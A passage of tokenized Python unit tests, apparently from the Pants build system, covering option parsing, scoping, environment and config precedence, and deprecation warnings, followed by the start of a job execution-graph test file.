'<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> options = self . _parse ( '<STR_LIT>' , env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> def test_choices ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , options . for_global_scope ( ) . str_choices ) <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:bar>' } } ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , options . for_global_scope ( ) . str_choices ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> options . for_global_scope ( ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> options . for_global_scope ( ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT> ] , options . for_global_scope ( ) . int_choices ) <EOL> def test_validation ( self ) : <EOL> def assertError ( expected_error , * args , ** kwargs ) : <EOL> with self . assertRaises ( expected_error ) : <EOL> options = Options . create ( args = [ ] , env = { } , config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ ] , option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , * args , ** kwargs ) <EOL> options . for_global_scope ( ) <EOL> assertError ( NoOptionNames ) <EOL> assertError ( OptionNameDash , '<STR_LIT>' ) <EOL> assertError ( OptionNameDoubleDash , '<STR_LIT>' ) <EOL> assertError ( InvalidKwarg , '<STR_LIT>' , badkwarg = <NUM_LIT> ) <EOL> assertError ( ImplicitValIsNone , '<STR_LIT>' , implicit_value = None ) <EOL> assertError ( BooleanOptionNameWithNo , '<STR_LIT>' , type = bool ) <EOL> assertError ( MemberTypeNotAllowed , '<STR_LIT>' , member_type = int ) <EOL> assertError ( MemberTypeNotAllowed , '<STR_LIT>' , type = dict , member_type = int ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = set ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = list ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = list ) <EOL> def test_frozen_registration ( self ) : <EOL> options = Options . create ( args = [ ] , env = { } , config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ task ( '<STR_LIT:foo>' ) ] , option_tracker = OptionTracker ( ) ) <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( FrozenRegistration ) : <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) <EOL> def test_implicit_value ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:default>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> def test_shadowing ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ task ( '<STR_LIT:bar>' ) , intermediate ( '<STR_LIT:foo>' ) , task ( '<STR_LIT>' ) ] , <EOL> args = '<STR_LIT>' , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_recursion ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:5> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT:6> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , options . for_global_scope ( ) . bar_baz ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options . for_scope ( '<STR_LIT>' ) <EOL> def test_no_recursive_subsystem_options ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ subsystem ( '<STR_LIT:foo>' ) ] , <EOL> args = '<STR_LIT>' , <EOL> option_tracker = OptionTracker ( ) ) <EOL> with self . assertRaises ( RecursiveSubsystemOption ) : <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , recursive = False ) <EOL> options . for_scope ( '<STR_LIT:foo>' ) <EOL> with self . assertRaises ( RecursiveSubsystemOption ) : <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , recursive = True ) <EOL> options . for_scope ( '<STR_LIT:foo>' ) <EOL> def test_is_known_scope ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> for scope_info in self . _known_scope_infos : <EOL> self . assertTrue ( options . is_known_scope ( scope_info . scope ) ) <EOL> self . assertFalse ( options . is_known_scope ( '<STR_LIT>' ) ) <EOL> def test_designdoc_example ( self ) : <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } , <EOL> } <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_global_scope ( ) . a ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> options . for_global_scope ( ) . c <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> self . assertEqual ( <NUM_LIT:3> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT:4> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> def test_file_spec_args ( self ) : <EOL> with tempfile . NamedTemporaryFile ( ) as tmp : <EOL> tmp . write ( dedent ( <EOL> """<STR_LIT>""" <EOL> ) ) <EOL> tmp . flush ( ) <EOL> cmdline = '<STR_LIT>' '<STR_LIT>' . format ( <EOL> filename = tmp . name ) <EOL> bootstrapper = OptionsBootstrapper ( args = shlex . split ( cmdline ) ) <EOL> bootstrap_options = bootstrapper . get_bootstrap_options ( ) . for_global_scope ( ) <EOL> options = self . _parse ( cmdline , bootstrap_option_values = bootstrap_options ) <EOL> sorted_specs = sorted ( options . target_specs ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' ] , sorted_specs ) <EOL> def test_passthru_args ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( '<STR_LIT:test>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( None ) ) <EOL> def test_global_scope_env_vars ( self ) : <EOL> def check_pants_foo ( expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_global_scope ( ) . pants_foo <EOL> self . assertEqual ( expected_val , val ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( None , { <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def check_bar_baz ( expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_global_scope ( ) . bar_baz <EOL> self . assertEqual ( expected_val , val ) <EOL> check_bar_baz ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( None , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( None , { <EOL> } ) <EOL> def test_scoped_env_vars ( self ) : <EOL> def check_scoped_spam ( scope , expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_scope ( scope ) . spam <EOL> self . assertEqual ( expected_val , val ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> def test_drop_flag_values ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> defaulted_only_options = options . drop_flag_values ( ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . bar_baz ) <EOL> self . assertIsNone ( defaulted_only_options . for_global_scope ( ) . bar_baz ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , defaulted_only_options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , defaulted_only_options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . pants_foo ) <EOL> self . assertEqual ( '<STR_LIT>' , defaulted_only_options . for_global_scope ( ) . pants_foo ) <EOL> def test_deprecated_option_past_removal ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( CodeRemovedError ) : <EOL> self . _parse ( '<STR_LIT>' ) . for_global_scope ( ) <EOL> @ contextmanager <EOL> def warnings_catcher ( self ) : <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> yield w <EOL> def test_deprecated_options ( self ) : <EOL> def assertWarning ( w , option_string ) : <EOL> self . assertEquals ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertTrue ( issubclass ( w [ - <NUM_LIT:1> ] . category , DeprecationWarning ) ) <EOL> warning_message = str ( w [ - <NUM_LIT:1> ] . message ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> warning_message ) <EOL> self . assertIn ( option_string , warning_message ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , options . for_global_scope ( ) . global_crufty ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . global_crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . global_crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , options . for_scope ( '<STR_LIT>' ) . crufty ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( w ) ) <EOL> def test_middle_scoped_options ( self ) : <EOL> """<STR_LIT>""" <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : <NUM_LIT:100> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> } , <EOL> env = { '<STR_LIT>' : <NUM_LIT> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : <NUM_LIT> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } , <EOL> env = { '<STR_LIT>' : <NUM_LIT:100> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> def test_complete_scopes ( self ) : <EOL> _global = GlobalOptionsRegistrar . get_scope_info ( ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { GlobalOptionsRegistrar . get_scope_info ( ) , <EOL> task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { intermediate ( '<STR_LIT:foo>' ) , task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { task ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } ) ) <EOL> def test_get_fingerprintable_for_scope ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> pairs = options . get_fingerprintable_for_scope ( '<STR_LIT>' ) <EOL> self . assertEquals ( len ( pairs ) , <NUM_LIT:3> ) <EOL> self . assertEquals ( ( str , '<STR_LIT>' ) , pairs [ <NUM_LIT:0> ] ) <EOL> self . assertEquals ( ( bool , True ) , pairs [ <NUM_LIT:1> ] ) <EOL> self . assertEquals ( ( int , <NUM_LIT> ) , pairs [ <NUM_LIT:2> ] ) <EOL> def assert_fromfile ( self , parse_func , expected_append = None , append_contents = None ) : <EOL> def _do_assert_fromfile ( dest , expected , contents ) : <EOL> with temporary_file ( ) as fp : <EOL> fp . write ( contents ) <EOL> fp . close ( ) <EOL> options = parse_func ( dest , fp . name ) <EOL> self . assertEqual ( expected , options . for_scope ( '<STR_LIT>' ) [ dest ] ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT:string>' , expected = '<STR_LIT>' , contents = '<STR_LIT>' ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = <NUM_LIT> , contents = '<STR_LIT>' ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = { '<STR_LIT:a>' : <NUM_LIT> , '<STR_LIT:b>' : ( <NUM_LIT:1> , <NUM_LIT:2> ) } , contents = dedent ( """<STR_LIT>""" ) ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = [ '<STR_LIT:a>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] , contents = dedent ( """<STR_LIT>""" ) ) <EOL> expected_append = expected_append or [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ] <EOL> append_contents = append_contents or dedent ( """<STR_LIT>""" ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = expected_append , contents = append_contents ) <EOL> def test_fromfile_flags ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' . format ( dest . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) , fromfile ) ) <EOL> self . assert_fromfile ( parse_func , expected_append = [ <NUM_LIT> ] , append_contents = '<STR_LIT>' ) <EOL> def test_fromfile_config ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { dest : '<STR_LIT>' . format ( fromfile ) } } ) <EOL> self . assert_fromfile ( parse_func ) <EOL> def test_fromfile_env ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' . format ( dest . upper ( ) ) : '<STR_LIT>' . format ( fromfile ) } ) <EOL> self . assert_fromfile ( parse_func ) <EOL> def test_fromfile_error ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> with self . assertRaises ( Parser . FromfileError ) : <EOL> options . for_scope ( '<STR_LIT>' ) <EOL> def test_fromfile_escape ( self ) : <EOL> options = self . _parse ( r'<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_scope ( '<STR_LIT>' ) . string ) <EOL> def test_ranked_value_equality ( self ) : <EOL> none = RankedValue ( RankedValue . NONE , None ) <EOL> some = RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , str ( none ) ) <EOL> self . assertEquals ( '<STR_LIT>' , str ( some ) ) <EOL> self . assertNotEqual ( some , none ) <EOL> self . assertEqual ( some , RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( some , RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( some , RankedValue ( RankedValue . CONFIG , '<STR_LIT>' ) ) <EOL> def test_option_tracker_required ( self ) : <EOL> with self . assertRaises ( Options . OptionTrackerRequiredError ) : <EOL> Options . create ( None , None , [ ] ) <EOL> def test_pants_global_designdoc_example ( self ) : <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } , <EOL> } <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_global_scope ( ) . a ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> options . for_global_scope ( ) . c <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> self . assertEqual ( <NUM_LIT:3> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT:4> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> def test_pants_global_with_default ( self ) : <EOL> """<STR_LIT>""" <EOL> config = { '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> def test_double_registration ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) <EOL> self . assertRaises ( OptionAlreadyRegistered , lambda : options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . backend . jvm . tasks . jvm_compile . execution_graph import ( ExecutionFailure , ExecutionGraph , <EOL> Job , JobExistsError , <EOL> NoRootJobError , UnknownJobError ) <EOL> class ImmediatelyExecutingPool ( object ) : <EOL> num_workers = <NUM_LIT:1> <EOL> def submit_async_work ( self , work ) : <EOL> work . func ( * work . args_tuples [ <NUM_LIT:0> ] ) <EOL> class PrintLogger ( object ) : <EOL> def error ( self , msg ) : <EOL> print ( msg ) <EOL> def debug ( self , msg ) : <EOL> print ( msg ) <EOL> def passing_fn ( ) : <EOL> pass <EOL> def raising_fn ( ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> class ExecutionGraphTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . jobs_run = [ ] <EOL> def execute ( self , exec_graph ) : <EOL> exec_graph . execute ( ImmediatelyExecutingPool ( ) , PrintLogger ( ) ) <EOL> def job ( self , name , fn , dependencies , size = <NUM_LIT:0> , on_success = None , on_failure = None ) : <EOL> def recording_fn ( ) : <EOL> self . jobs_run . append ( name ) <EOL> fn ( ) <EOL> return Job ( name , recording_fn , dependencies , size , on_success , on_failure ) <EOL> def test_single_job ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" ] ) <EOL> def test_single_dependency ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ 